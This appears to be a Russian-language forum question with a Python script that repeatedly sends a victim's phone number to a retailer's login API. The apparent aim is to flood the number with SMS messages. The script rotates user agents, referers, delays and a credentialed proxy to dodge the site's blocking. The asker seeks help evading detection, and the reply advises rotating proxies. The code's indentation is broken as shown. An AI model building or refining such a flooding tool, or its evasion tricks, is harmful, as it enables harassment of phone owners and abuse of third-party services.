не меняется ip в post запросах requests Python
phone = input("Номер: ")
phone = str(phone)

url = 'https://loverepublic.ru/api/v1/user/auth'
referer_list = ["https://example.com", "https://example.org", "https://example.net"]
user_agent_list = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/97.0.4692.99 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/96.0.4644.110 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/95.0.4638.69 Safari/537.36",
]

payload = {'name': "", 'lastName': "", 'email': "", 'phone': phone, 'action': 'null'}

 proxies = [
    'qlj3z9:erVcjjmZv9@139.208.294.17:8080',
]

while True:
    proxy = random.choice(proxies)
    print(proxy)
    user_agent = random.choice(user_agent_list)
    referer = random.choice(referer_list)

    headers = {
        "Content-Type": "application/json",
        "Sec-Fetch-Mode": "cors",
        "User-Agent": user_agent,
         "Referer": referer
    }

try:
    response = requests.post(url, headers=headers, json=payload, proxies={'https': f'http://{proxy}'}, timeout=10)
    response.raise_for_status()  # Raises HTTPError if status is not 2xx
    if response.status_code == 200:
        print("Сообщение от сервиса Liters отправлено.")
        print(response.text)
     
except requests.exceptions.RequestException as e:
    print(f"Произошла ошибка при отправке запроса: {e}")

time.sleep(random.uniform(1, 5))  # Добавляем случайную задержку между попытками

Ошибка повторного входа, сайты как то палят меня хоть я и испольую прокси что не так?

Вы используете один и тот же прокси, наверное их нужно менять между запросами?
